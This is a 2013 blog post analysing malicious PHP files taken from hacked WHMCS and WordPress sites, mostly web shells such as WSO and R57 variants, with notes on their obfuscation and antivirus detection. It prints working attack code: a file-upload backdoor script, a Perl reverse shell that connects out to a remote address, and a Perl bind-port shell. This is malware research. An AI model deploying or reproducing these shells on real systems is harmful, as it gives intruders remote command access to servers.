Home » Miscellaneous

Some interesting malicious PHP files

16 September 2013 No Comment

Hello fellow internet citizens (and bots)

Here is some cool PHP malicious files i found in one hacked installation of WHMCS and one hacked wordpress site.

Note #1 they are mostly not a result of one hack/hacker but several.
Note #2 those are harmful files running them on your computer is not advised, and those are supplied for research purposes only.

Here are the files: click here password is: infected

This is the most interesting file which is r.php (VirusTotal scan: 3/48) it is “WHMCS Killer” by rab3oun


The decoding line is decoded to:


It keeps reading the encoded junk which is after the closure of the PHP tag, it decodes it 4 times.
The decoded version (which is still hard to read :/) is included as r_DECODED.php, and surprising that the encoded version is detected by 3 anti-virus’es and the original is not (0/46)

Next file is 825451_n2n.jpg (VirusTotal scan: 5/46) which is a nice shell that’s obfuscated twice.
It originally goes as.

<?php $_F=__FILE__;$_X=’Pz48P3BocA0KNX1IDR[TOO_LONG]4NCg==’;

The second line decodes to:


Decoding it again (Decoding $_X) results in a full featured shell , included as 825451_n2n_DECODED.php (VirusTotal scan: 7/44)

Next file is b0x.php (VirusTotal scan 0/47) which is a simple upload script, which wasn’t obfuscated.

echo ‘<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">’;
echo ‘<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>’;
if( $_POST[‘_upl’] == "Upload" ) {
if(@copy($_FILES[‘file’][‘tmp_name’], $_FILES[‘file’][‘name’])) { echo ‘<b>Upload SUKSES !!!</b><br><br>’; }
else { echo ‘<b>Upload GAGAL !!!</b><br><br>’; }

Next file is index.php (VirusTotal scan: 16/48) WSO Shell v2.3 Web Shell by oRb, and all custom function names start with WSO
It’s not entirely obfuscated except two chunks which are saved into a perl script and executed.
#1 Back connect code $back_connect_p (decoded included as bc.pl):

use Socket;
$iaddr=inet_aton($ARGV[0]) || die("Error: $!\n");
$paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system(‘/bin/sh -i’);

#2 Port binding script $bind_port_p (decoded included as bp.pl):

$SHELL="/bin/sh -i";
if (@ARGV < 1) { exit(1); }
use Socket;
socket(S,&PF_INET,&SOCK_STREAM,getprotobyname(‘tcp’)) || die "Cant create socket\n";
bind(S,sockaddr_in($ARGV[0],INADDR_ANY)) || die "Cant open port\n";
listen(S,3) || die "Cant listen port\n";
while(1) {
if(!($pid=fork)) {
die "Cannot fork" if (!defined $pid);
open STDIN,"<&CONN";
open STDOUT,">&CONN";
open STDERR,">&CONN";
exec $SHELL || die print CONN "Cant execute $SHELL\n";
close CONN;
exit 0;

Next file is index (2).php (VirusTotal scan: 26/47) Which is a variant of the famous R57 shell (Variant by SnIpEr_SA) – also not obfuscated.

Next file is install.php (VirusTotal scan: 1/46) it’s an obfuscated version of webadmin.php which is a legit web admin/managing script but of course hackers abused it.
And i am not sure why did he even obfuscated it, the clean version also is detected by one antivirus engine

Next file is New.php (VirusTotal scan: 1/48) which is obfuscated.
It’s decoded to New_DECODED.php (VirusTotal scan: 28/45) and it turns out to be another r57 shell variant (by tryag).

Next file is SaD.php (VirusTotal scan: 8/45) which is a normal PHP shell with nothing significant but it’s the first time i see it.

Next file is xx.php (VirusTotal scan: 6/46) is a cpanel/ftp brute forcing tool.

That’s it, enjoy!

Your opinion matters!

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.